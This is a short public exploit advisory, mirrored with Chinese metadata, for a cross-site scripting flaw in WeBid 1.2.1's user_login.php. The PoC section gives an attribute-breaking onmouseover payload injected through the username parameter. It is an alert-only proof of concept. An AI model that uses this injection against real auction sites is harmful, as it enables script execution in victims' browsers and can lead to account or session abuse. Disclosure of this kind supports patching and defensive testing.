WeBid 1.2.1 XSS Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1474904 漏洞类型
发布时间 2019-02-08 更新时间 2019-02-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019020072
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
####################################################################

# Exploit Title : WeBid 1.2.1 XSS Vulnerability
# Author [ Discovered By ] : Mehmet EMİROĞLU
# Date : 07/02/2019
# Vendor Homepage : http://www.webidsupport.com/index.php
# Software Download Link : https://sourceforge.net/projects/simpleauction/
# Affected Versions : 1.2.1
# Tested On : Wampp, Windows,Lampp
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type :
# Sofrware Description : Open source php/mysql fully featured auction script.
  Perfect for those who want to start their own auction site.

####################################################################

# Impact :
*********

# This web application called as WeBid 1.2.1 version.
# The proof will be the picture below.
# https://i.hizliresim.com/r55qZP.jpg

####################################################################

# PoC :
****************************
# XSS Code : " onmouseover="alert(1007175)
# Post Request : http://localhost/[PATH]/user_login.php^csrftoken=&password=2829008&username=2871992" onmouseover="alert(1007175)

####################################################################